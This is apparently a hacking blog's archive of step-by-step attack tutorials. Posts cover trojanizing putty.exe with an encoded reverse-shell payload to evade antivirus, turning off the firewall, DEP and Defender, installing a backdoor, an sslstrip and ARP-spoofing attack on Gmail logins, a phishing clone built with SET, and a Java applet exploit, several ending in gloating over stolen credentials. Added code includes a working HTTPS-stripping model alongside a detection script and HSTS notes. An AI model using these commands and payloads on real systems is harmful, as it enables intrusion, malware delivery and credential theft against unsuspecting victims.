
Tuesday, 7 April 2015

Windows Gather Enum User MUICache metasploit module



This module gathers information about the files and file paths that logged-on users have executed on the system, and checks whether each file still exists. The information comes from the MUICache registry key (on Windows 7 under HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache, on Windows XP under HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache). If the user is logged in when the module runs, it collects the MUICache entries by reading the registry directly; if the user is not logged in, it downloads that user's registry hive (NTUSER.DAT or UsrClass.dat) from the system and parses the MUICache contents from the downloaded hive. MUICache stores a program's FriendlyAppName and ApplicationCompany version strings when the shell launches it, so it is evidence that a program ran, but the absence of an entry does not prove that a program never ran.

Module : post/windows/gather/enum_muicache

msf > use post/windows/gather/enum_muicache
msf post(enum_muicache) > sessions
        ...sessions...
msf post(enum_muicache) > set SESSION <session-id>
msf post(enum_muicache) > show options
        ...show and set options...
msf post(enum_muicache) > run
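The module does the hive parsing for you, but it helps to see what the raw data looks like and how little is needed to triage it. The following is an added example written for this post, not the Metasploit module's code: it parses a constructed reg export of the Windows 7 MuiCache key named above, groups the FriendlyAppName/ApplicationCompany values per executable, checks whether each binary is still present (the existence check is injectable so it can be run against a mounted image rather than the live system) and flags binaries launched from user-writable locations. The sample entries and the function names are constructed.

```python
"""Parse MUICache entries from a `reg export` text dump and triage them.
Added example for this post; not the Metasploit module's code. The export
below is constructed. On Windows 7 the live key is
HKCU\\Software\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache
(backed by UsrClass.dat); on Windows XP it is
HKCU\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache (in NTUSER.DAT)."""
import os
import re
from collections import defaultdict

# Constructed sample: what `reg export` of the MuiCache key produces.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"LangID"=hex:09,04
"C:\\Users\\bob\\Downloads\\puttyE.exe.FriendlyAppName"="PuTTY"
"C:\\Users\\bob\\Downloads\\puttyE.exe.ApplicationCompany"="Simon Tatham"
"C:\\Windows\\System32\\netsh.exe.FriendlyAppName"="Network Command Shell"
"C:\\Windows\\System32\\netsh.exe.ApplicationCompany"="Microsoft Corporation"
"C:\\Users\\bob\\AppData\\Local\\Temp\\nc.exe.FriendlyAppName"="nc"
'''

# Each value name is "<full path>.<property>"; reg export doubles backslashes.
VALUE_RE = re.compile(
    r'^"(?P<path>.+?)\.(?P<prop>FriendlyAppName|ApplicationCompany)"="(?P<val>.*)"$')


def parse_muicache(reg_text):
    """Return {executable_path: {property: value}} for every MUICache entry."""
    entries = defaultdict(dict)
    for line in reg_text.splitlines():
        m = VALUE_RE.match(line.strip())
        if not m:
            continue  # header, key name, LangID and blank lines
        path = m.group("path").replace("\\\\", "\\")  # undo reg export escaping
        entries[path][m.group("prop")] = m.group("val")
    return dict(entries)


def in_user_writable_dir(path):
    """Binaries run from profile or temp directories deserve a closer look."""
    p = path.lower()
    return (p.startswith("c:\\users\\")
            or p.startswith("c:\\documents and settings\\")
            or "\\temp\\" in p)


def report(entries, exists=os.path.exists):
    """Flatten entries into rows. `exists` is injectable so the presence check
    can be pointed at a mounted image or a file listing instead of this host."""
    rows = []
    for path in sorted(entries):
        meta = entries[path]
        rows.append({
            "path": path,
            "name": meta.get("FriendlyAppName", ""),
            "company": meta.get("ApplicationCompany", ""),
            "present": bool(exists(path)),
            "suspicious": in_user_writable_dir(path),
        })
    return rows


if __name__ == "__main__":
    for row in report(parse_muicache(SAMPLE_REG_EXPORT)):
        flag = "!" if row["suspicious"] else " "
        print(f"{flag} {row['path']}  ({row['name']} / {row['company']})"
              f"  present={row['present']}")
```

Run against a live system the default os.path.exists does the same "does the file still exist" check the module performs; the puttyE.exe entry in the sample is the kind of trace the msfencode post further down this page leaves behind.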

Saturday, 28 March 2015

Windows SYSTEM Escalation via KiTrap0D


This module creates a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy (MS10-015). If the session in use is already elevated, the exploit will not run. The module relies on kitrap0d.x86.dll and is not supported on x64 editions of Windows.

exploit : exploit/windows/local/ms10_015_kitrap0d

Targets : Windows 2K SP4 - Windows 7 (x86)



Win32k.sys elevation of privilege vulnerability






win32k.sys, the kernel-mode driver in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1, allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability" (CVE-2014-4113, fixed in MS14-058).

Vulnerable systems (as targeted by the linked exploit): Windows XP SP3, Windows 2003 SP2, Windows 7 SP1, Windows 2008 32-bit and Windows 2008 R2 SP1 64-bit. This is a local privilege escalation: you need a low-privileged session on the machine first.

Click Here to Get exploit


Friday, 11 July 2014

How to Disable Windows Firewall using Metasploit



Windows Firewall helps protect a PC from attackers and malicious software. In Windows 7 it is still a host-based packet filter, but Microsoft made it more flexible and easier to use.

For example, protection and notifications can be tuned per network profile (Home, Work and Public). When connected to a public network such as a library or coffee shop you may want to block all incoming connections, while at home or work that would be overkill. Whatever level of protection you choose for each profile, switching between them is easy.

Command (run from a command shell on the victim, for example a Meterpreter shell; it needs an administrative token, so escalate first if getuid does not show an elevated user. The netsh firewall context is deprecated from Vista onward in favour of netsh advfirewall, but it still works on Windows 7 for compatibility):

netsh firewall set opmode disable

Wednesday, 9 July 2014

How to stop Data Execution Prevention (DEP) using Metasploit in Windows


Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command (needs an administrative token; the change only takes effect at the next reboot, and on x64 Windows the nx setting governs 32-bit processes only, since 64-bit processes always run with DEP):

bcdedit.exe /set {current} nx AlwaysOff

Tuesday, 8 July 2014

How to stop the Windows Defender service on a remote PC using Metasploit


When Windows Defender is on, you're notified when spyware or other potentially unwanted software tries to install itself or run on your computer. If you use the default settings, Windows Defender also checks for new definitions (files that are used to determine if software is spyware) and automatically removes any detected item that has a recommended removal action.

Command (needs an administrative token):

net stop WinDefend
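The three commands in the posts above (disabling the firewall, DEP and Defender) are exactly what a defender should alert on once they show up in process-creation telemetry. The following is an added example, not code from this page or from Metasploit: a small Python detector run over constructed, pipe-delimited process-creation records of the form time|user|parent image|command line, the fields you would get from Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled. Besides the exact commands above it also matches the netsh advfirewall form that Windows 7 and later use natively, the sc.exe variant of stopping the service, and the net1.exe child that net.exe spawns to do its work. The log lines, user and host names are constructed.

```python
"""Detect defence-disabling commands in process-creation logs.
Added example for this page; not part of Metasploit or the original posts.
Records are constructed and pipe-delimited: time|user|parent_image|command_line."""
import re

SAMPLE_EVENTS = [
    "2014-07-11T10:22:01Z|WIN7-PC\\bob|C:\\Windows\\System32\\cmd.exe|netsh firewall set opmode disable",
    "2014-07-11T10:22:05Z|WIN7-PC\\bob|C:\\Windows\\System32\\cmd.exe|netsh firewall show state",
    "2014-07-11T10:23:10Z|WIN7-PC\\bob|C:\\Windows\\System32\\cmd.exe|netsh advfirewall set allprofiles state off",
    "2014-07-09T09:01:44Z|WIN7-PC\\bob|C:\\Windows\\System32\\cmd.exe|bcdedit.exe /set {current} nx AlwaysOff",
    "2014-07-09T09:02:00Z|WIN7-PC\\bob|C:\\Windows\\System32\\cmd.exe|bcdedit /enum",
    # net.exe hands the real work to net1.exe, so the child is what shows up
    "2014-07-08T14:30:12Z|WIN7-PC\\bob|C:\\Windows\\System32\\net.exe|C:\\Windows\\system32\\net1 stop WinDefend",
    "2014-07-08T14:31:00Z|WIN7-PC\\bob|C:\\Windows\\System32\\cmd.exe|net stop Spooler",
    "2014-07-08T14:32:07Z|WIN7-PC\\bob|C:\\Windows\\System32\\cmd.exe|sc stop WinDefend",
]

# (alert name, command-line pattern). Case-insensitive: cmd.exe does not care.
RULES = [
    ("Windows Firewall disabled (legacy netsh firewall)",
     re.compile(r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode=)?disable\b", re.I)),
    ("Windows Firewall disabled (netsh advfirewall)",
     re.compile(r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    ("DEP disabled via bcdedit",
     re.compile(r"\bbcdedit(\.exe)?\b.*\bnx\s+AlwaysOff\b", re.I)),
    ("Windows Defender service stopped",
     re.compile(r"\b(net1?(\.exe)?|sc(\.exe)?)\s+stop\s+windefend\b", re.I)),
]


def parse_event(line):
    """Split one record; the command line is last because it contains spaces."""
    time, user, parent, cmdline = line.split("|", 3)
    return {"time": time, "user": user, "parent": parent, "cmdline": cmdline}


def detect(lines, rules=RULES):
    """Return (time, user, alert name, command line) for each matching record."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for name, pattern in rules:
            if pattern.search(ev["cmdline"]):
                hits.append((ev["time"], ev["user"], name, ev["cmdline"]))
                break  # one alert per event is enough
    return hits


if __name__ == "__main__":
    for time, user, name, cmdline in detect(SAMPLE_EVENTS):
        print(f"{time} {user}: {name}: {cmdline}")
```

The benign lookalikes in the sample (netsh firewall show state, bcdedit /enum, net stop Spooler) are there to show the patterns key on the state-changing verbs, not on the tool names; anchoring on netsh.exe or bcdedit.exe alone would drown the alert in administrator noise.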


Wednesday, 10 July 2013

How to Hack a Computer with Armitage


Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:
  •     Use the same sessions
  •     Share hosts, captured data, and downloaded files
  •     Communicate through a shared event log.
  •     Run bots to automate red team tasks

VIDEO : 

Sunday, 12 August 2012

How to install a backdoor in windows using metasploit


After going through all the hard work of exploiting a system, it's often a good idea to leave yourself an easier way back into the system later. This way, if the service you exploited is down or patched, you can still gain access to the system. This is where Alexander Sotirov's 'metsvc' comes in handy and was recently added to the Metasploit trunk. To read about the original implementation of metsvc, go to http://www.phreedom.org/software/metsvc/

Using this backdoor, you can gain a Meterpreter shell at any point.

One word of warning before we go any further. Metsvc as shown here requires no authentication, and it listens on TCP port 31337 by default. This means that anyone who can reach the port can use your backdoor, which is a significant risk during a penetration test. In a real engagement you would either alter the source to require authentication, or restrict remote connections to the port by some other means (and remove the service when the engagement ends).

TUTORIAL VIDEO

Monday, 9 January 2012

How to bypass internet security using Metasploit (video demonstration included)

How to bypass antivirus using msfpayload and msfencode


  • I have already posted many articles on hacking Windows with Metasploit, trojans and so on.
  • Today I will show how to get into a Windows machine using PuTTY as the carrier.
  • First the payload is embedded into putty.exe and encoded with Metasploit so that antivirus does not flag it; the payload connects back from the victim machine to the attacker.
  • You then send the encoded putty.exe to the victim. When the victim runs it, the payload opens a connection from the victim machine to the attacker machine; the encoding is what lets it slip past signature-based antivirus.
  • You get a reverse shell in Metasploit and can act on the victim machine through it.
  • From there you can install a persistent tool such as netcat, harvest passwords (Firefox, Windows logon and so on), add a user account, etc.


Requirement:




Steps:

Login to Backtrack machine

root@bt# cd /opt/framework/msf3/

root@bt:/opt/framework/msf3# mkdir work

copy putty.exe into the work directory created above

root@bt:/opt/framework/msf3# mv /root/Desktop/putty.exe work/

root@bt:/opt/framework/msf3# msfpayload windows/shell_reverse_tcp LHOST=<your ip> LPORT=80 R | msfencode -t exe -x work/putty.exe -o /root/Desktop/puttyE.exe -e x86/shikata_ga_nai -k -c 5

wait

It will create puttyE.exe on the root user's desktop; this is the file you hand to the victim. Two caveats: msfpayload and msfencode were removed from Metasploit in 2015 and replaced by msfvenom, which accepts the same -x (template), -k (keep template behaviour) and -e (encoder) options; and x86/shikata_ga_nai with a handful of iterations is well known to antivirus engines today, so do not expect it to evade current products.

After that start listener:

root@bt# msfconsole

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp

msf exploit(handler) > set LHOST <your ip>

msf exploit(handler) > set LPORT 80

msf exploit(handler) > exploit

Now go to victim machine and open puttyE.exe

When puttyE.exe runs, the handler in your BackTrack 5 R1 console receives a command shell on the victim machine (windows/shell_reverse_tcp gives a plain cmd.exe shell; use windows/meterpreter/reverse_tcp in both the msfpayload and handler commands if you want Meterpreter):

- - - - - Video demonstration - - - - -





Saturday, 24 December 2011

man in the middle attack using ssl strip


SSL STRIP

This tool (by Moxie Marlinspike) provides a demonstration of the HTTPS stripping attacks he presented at Black Hat DC 2009. It transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements
 For sslstrip (in BackTrack 5)
  • Python >= 2.5 (apt-get install python)
  • The python "twisted-web" module (apt-get install python-twisted-web)

Setup

  • tar zxvf sslstrip-0.9.tar.gz
  • cd sslstrip-0.9
  • (optional) sudo python ./setup.py install

Man in the Middle Attack Using SSL STRIP

step 1 : open Terminal and type

echo "1" > /proc/sys/net/ipv4/ip_forward

this command flips your machine into IP forwarding mode, so the traffic you redirect to yourself is passed on instead of dropped


step 2 : now set up iptables to redirect HTTP traffic to sslstrip:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

in my case 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777

this rule redirects all traffic arriving for destination port 80 to local port 7777, where sslstrip will listen


step 3 : now run sslstrip

path - /pentest/web/sslstrip

./sslstrip.py -l <listenPort> -w <output file name>

in my case

./sslstrip.py -l 7777 -w mitm.txt


-w option - write everything sslstrip captures (including POST bodies, which is where the credentials are) to the named file



step 4 : do not close this terminal. Open a new terminal and run arpspoof so that the victim's traffic passes through your machine.


arpspoof poisons the victim's ARP cache so that it sends the traffic meant for the gateway to you instead:


arpspoof -i <interface> -t <targetIP> <gatewayIP>

in my case 

arpspoof -i eth1 -t 192.168.1.102 192.168.1.1


IN VICTIM machine

If the commands succeeded, the victim PC's ARP cache now maps the gateway's IP address to your MAC address, so its traffic flows through your machine and you can read it.

When the victim opens Gmail, the page that loads looks like the real site, but it was rewritten on the way through sslstrip.
The one difference: the real Gmail site is HTTPS, this one is HTTP.

When the victim enters their Gmail credentials into the stripped page, the POST travels in plaintext. arpspoof only redirects the traffic; it is sslstrip that reads the credentials and writes them to the file given with -w in /pentest/web/sslstrip.

in my case

txt file name - mitm.txt


You now have the victim's Gmail credentials. :D
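To make clear what sslstrip is doing between the iptables redirect in step 2 and the victim's login above, here is an added example written for this post; it is not sslstrip's own code, and the class name HttpsStripper, the sample HTML and the response headers are constructed. It models the two halves of the trick: downgrade every https:// reference before the victim sees it, and remember each one so that when the victim's plaintext request for it arrives, the proxy fetches the real page over TLS and relays it in the clear. It also downgrades Location redirects, and strips the Secure flag from cookies so the browser will keep sending the session cookie over the plaintext leg.

```python
"""Model of the HTTPS-stripping rewrite. Added example for this post, not
sslstrip's own code. HTML, headers and names below are constructed."""
import re
from urllib.parse import urlsplit

# Any https:// URL inside markup or a header value, stopping at quotes/brackets.
HTTPS_URL = re.compile(r'https://[^\s"\'<>]+')


class HttpsStripper:
    def __init__(self):
        # (host, path) pairs the victim has been shown as http:// but which are
        # really https://; the proxy must use TLS upstream for these.
        self.stripped = set()

    def _downgrade(self, url):
        parts = urlsplit(url)
        self.stripped.add((parts.netloc.lower(), parts.path or "/"))
        return "http://" + url[len("https://"):]

    def rewrite_body(self, html):
        """Rewrite https:// links and form actions in a page served to the victim."""
        return HTTPS_URL.sub(lambda m: self._downgrade(m.group(0)), html)

    def rewrite_headers(self, headers):
        """Downgrade Location redirects and drop the Secure cookie attribute."""
        out = {}
        for name, value in headers.items():
            if name.lower() == "location" and value.startswith("https://"):
                value = self._downgrade(value)
            elif name.lower() == "set-cookie":
                value = re.sub(r";\s*secure\b", "", value, flags=re.I)
            out[name] = value
        return out

    def upstream_scheme(self, host, path):
        """For a plaintext request from the victim, pick the scheme to use upstream."""
        return "https" if (host.lower(), path or "/") in self.stripped else "http"


if __name__ == "__main__":
    # Constructed response the real site would have sent over the victim's first, plain-HTTP request.
    page = ('<a href="https://mail.google.com/mail/">Gmail</a>\n'
            '<form action="https://accounts.google.com/ServiceLogin" method="post">')
    proxy = HttpsStripper()
    print(proxy.rewrite_body(page))
    print(proxy.rewrite_headers({"Set-Cookie": "SID=abc; Path=/; Secure; HttpOnly"}))
    # The victim's browser now POSTs to http://accounts.google.com/ServiceLogin;
    # the proxy logs the body and forwards it over TLS:
    print(proxy.upstream_scheme("accounts.google.com", "/ServiceLogin"))
```

The attack depends on the victim's first request to the site being plain HTTP (a typed hostname, a bookmark, a link from another page). HTTP Strict Transport Security (RFC 6797) closes that window: once a browser has seen the header for a host, or the host is on the browser's preload list, it upgrades the http:// request itself before anything leaves the machine. Google's domains are preloaded in all major browsers, so the exact Gmail scenario in this post no longer works against a current browser; sites without HSTS remain exposed.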

- - - - - Video tutorial - - - - -

If you have any questions, feel free to ask.
:D




Wednesday, 21 December 2011

Social Engineer Toolkit (SET)-Credential Harvester Attack(hack gmail,facebook,twitter account)


SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.

Requirements

1. BackTrack 5

Social Engineer Toolkit (SET)-Credential Harvester Attack 

step 1 : open a terminal and change to the SET directory:


cd /pentest/exploits/set

then run

./set

to start the Social Engineer Toolkit.

It looks like this:






step 2 : Select option 1 : Social-Engineering Attacks from the SET main menu

A new menu opens:




step 3 : Select option 2 : Website Attack Vectors

The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.

A new menu opens:




step 4 : Select option 3 : Credential Harvester Attack Method

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.

A new menu opens:




step 5 : Select option 2 : Site Cloner

A new prompt opens.


step 6 : Enter the target URL you want to clone, e.g. https://gmail.com

then press Enter.


Now the Credential Harvester is listening on port 80 and the attacker PC is ready.

The URL to give your victim is http://<your ip address>/

in my case

  
http://192.168.1.103/


IN VICTIM PC

When the victim opens http://192.168.1.103/, the browser shows what looks like the Gmail login page, but it is the clone made by SET.




When the victim enters their Gmail credentials into the cloned page, the page posts them back to the attacker PC, where SET prints them, and then redirects the victim to the real site.








You now have the victim's Gmail credentials. :D

- - - - - Video tutorial - - - - -


If you want to learn how to use the Credential Harvester Attack over the internet, click here (YouTube video in HD).

If you have any questions, feel free to ask.
:D 



Tuesday, 13 December 2011

Hack windows 7 pc using metasploit (JAVA APPLET METHOD)


Requirement : 

1.Metasploit Framework
2. Operating system (I recommend a Linux distribution such as BackTrack 5)

Step By Step :

1. Open msfconsole and look for the java_signed_applet exploit with the command search java_signed_applet. If it is not found, update your Metasploit Framework to a newer version with msfupdate. Once the exploit is available, continue with the commands below.


use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit
set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp Meterpreter payload to connect back to our machine

2. Some options are required for the attack to succeed; show options lists them all.



set srvhost 192.168.1.103 ---> host that serves the exploit
set srvport 80 ---> I chose 80 because a plain http:// URL without a port looks more natural in web-based social engineering
set uripath / ---> URL path to send to the victim (http://192.168.1.103/)
set lhost 192.168.1.103 ---> connect-back address for the payload once the applet runs
set lport 443 ---> connect-back port for the payload


3.exploit

The URL to give your victim is http://192.168.1.103/

4. When the victim opens that link, the browser immediately shows a Java dialog warning that the applet's digital signature cannot be verified, like the picture below. (Java 7 Update 51 and later block self-signed applets by default, so this only works against out-of-date Java installs.)

5. Once the victim has opened the malicious URL and clicked Run, the session comes in.

Press CTRL+C to stop the job, or run sessions -l to view the active sessions.

You now have a Meterpreter shell on your BackTrack PC.



- - - - - Video tutorial - - - - -


